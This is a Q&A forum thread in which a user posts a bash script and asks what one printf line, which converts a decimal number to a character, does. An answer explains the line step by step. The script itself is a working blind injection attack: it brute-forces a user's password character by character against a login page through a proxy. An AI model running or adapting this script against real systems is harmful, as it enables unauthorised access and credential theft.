# I dont understant this line of bash script

Tags: bash

```
#!/bin/bash

HOST=172.31.179.1
PROXY=10.10.10.200:3128
USER=$1
PASS=""

PAYLOAD="'or substring(Password,POS,1)='BRUTE"

 for pos in $(seq 1 30); do
    for d in $(seq 33 126); do
        char=$(printf \\$(printf "%o" "$d"))
        payload="${PAYLOAD/POS/$pos}"
        payload="${payload/BRUTE/$char}"
        result="$(curl -s \
                       -x $PROXY \
                       -d "Username=${USER}&Password=${payload}" \
                       http://$HOST/intranet.php)"
        if grep $USER <<<"$result" &>/dev/null; then
            PASS=${PASS}$char
            echo $PASS
            break
        fi
    done
done

echo "[+] User is $USER, Password is $PASS"
```

Hey everyone,
This code finds the password with brute force but, i dont understand this line

```
char=$(printf \\$(printf "%o" "$d"))
```

Can you help me please ?

Comment: See [this Q&A](https://unix.stackexchange.com/q/311904/118235).

Comment: Your answer is awesome!

Answer (score 2):

It takes a decimal number, converts it into an octal representation, then interprets it as a character and store it into a variable.

More detailed description (see [printf(1)](https://man7.org/linux/man-pages/man1/printf.1.html) man for better explanation):

- the inner `printf "%o" "$d"` prints an octal number based on a decimal number `$d` (e. g. if `$d` is `65`, it prints `101`)
- `$()` means *command substition*, i. e. instead of printing, the octal number (`101`) is going to be substituted into the shell command itself
- `\\` prepends a backslash to the number (e. g. `\101`) (double backslash must be used, as single backslash would have disabled command substitution `$()`)
- after the first substitution, the whole command looks like so: `char=$(printf \101)`
- `\N` is recognized as an *escape sequence* by `printf` and interpreted as an character with octal value of `N`, thus the outer `printf` prints this character, e. g. `A` (because octal value of `A` character in ASCII is `101`)
- the outer `$()` then ensures that the resulting character is not printed, but substituted into shell command
- after the final substitution, the command looks like this: `char=A`

The reason why 2 conversions are needed for obtaining a character is obvious:

- character values are generated by `seq` in decimal representation
- `printf` does not accept numbers in decimal representation, instead octal representation has to be used

Comment: You re awesome! I find answers all questions on my mind..